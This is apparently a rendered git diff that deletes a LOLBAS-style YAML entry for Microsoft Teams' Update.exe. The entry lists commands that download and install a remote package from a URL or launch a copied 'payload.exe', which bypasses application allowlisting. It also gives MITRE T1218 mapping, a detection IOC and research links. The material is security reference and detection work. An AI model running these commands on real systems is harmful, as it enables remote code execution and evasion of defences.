- Person: Matt
|
||||||
Handle: '@NotoriousRebel1'
|
Handle: '@NotoriousRebel1'
|
||||||
|
- Person: Asif Matadar
|
||||||
|
Handle: '@d1r4c'
|
||||||
---
|
---
|
||||||
|
@ -1,83 +0,0 @@
|
|||||||
---
|
|
||||||
Name: Update.exe
|
|
||||||
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
|
|
||||||
Author: 'Oddvar Moe'
|
|
||||||
Created: '2019-06-26'
|
|
||||||
Commands:
|
|
||||||
- Command: Update.exe --download [url to package]
|
|
||||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
|
||||||
Usecase: Download binary
|
|
||||||
Category: Download
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1218
|
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
|
||||||
- Command: Update.exe --update [url to package]
|
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
|
||||||
Usecase: Download and execute binary
|
|
||||||
Category: AWL Bypass
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1218
|
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
|
||||||
- Command: Update.exe --update [url to package]
|
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
|
||||||
Usecase: Download and execute binary
|
|
||||||
Category: Execute
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1218
|
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
|
||||||
- Command: Update.exe --updateRoolback=[url to package]
|
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
|
||||||
Usecase: Download and execute binary
|
|
||||||
Category: AWL Bypass
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1218
|
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
|
||||||
- Command: Update.exe --updateRollback=[url to package]
|
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
|
||||||
Usecase: Download and execute binary
|
|
||||||
Category: Execute
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1218
|
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
|
||||||
Usecase: Application Whitelisting Bypass
|
|
||||||
Category: AWL Bypass
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1218
|
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
|
||||||
Usecase: Execute binary
|
|
||||||
Category: Execute
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1218
|
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
|
||||||
Full_Path:
|
|
||||||
- Path: '%localappdata%\Microsoft\Teams\update.exe'
|
|
||||||
Code_Sample:
|
|
||||||
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
|
|
||||||
Detection:
|
|
||||||
- IOC: Update.exe spawned an unknown process
|
|
||||||
Resources:
|
|
||||||
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
|
|
||||||
- Link: https://twitter.com/reegun21/status/1144182772623269889
|
|
||||||
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
|
||||||
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
|
|
||||||
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
|
|
||||||
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
|
|
||||||
Acknowledgement:
|
|
||||||
- Person: Reegun J (OCBC Bank)
|
|
||||||
Handle: '@reegun21'
|
|
||||||
- Person: Mr.Un1k0d3r
|
|
||||||
Handle: '@MrUn1k0d3r'
|
|
||||||
- Person: Adam
|
|
||||||
Handle: '@Hexacorn'
|
|
||||||
---
|
|
Loading…
Reference in New Issue
Block a user